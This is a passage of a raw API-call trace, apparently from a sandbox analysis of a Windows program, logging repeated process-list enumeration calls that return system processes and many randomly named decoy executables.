cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0138.492] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0138.492] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0138.493] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0138.494] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0138.495] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.496] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.496] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.497] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.498] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.499] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0138.500] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.501] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.501] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0138.503] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.504] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0138.506] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0138.507] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0138.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0138.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.521] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0138.522] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0138.523] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0138.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0138.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0138.528] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0138.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0138.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0138.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0138.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0138.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0138.537] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0138.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0138.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0138.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0138.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0138.544] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0138.546] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0138.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0138.548] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0138.549] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0138.550] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.551] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0138.560] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0138.561] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0138.562] CloseHandle (hObject=0xbc) returned 1 [0138.562] Sleep (dwMilliseconds=0x12c) [0138.885] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0138.893] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.894] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0138.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0138.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0138.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0138.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0138.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0138.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0138.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0138.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0138.902] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.903] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.904] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.906] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0138.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0138.910] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.913] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0138.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0138.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0138.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0138.921] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0138.922] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0138.924] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0138.925] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0138.927] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0139.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0139.009] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0139.011] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0139.012] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0139.013] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0139.014] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0139.016] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0139.017] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0139.019] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, 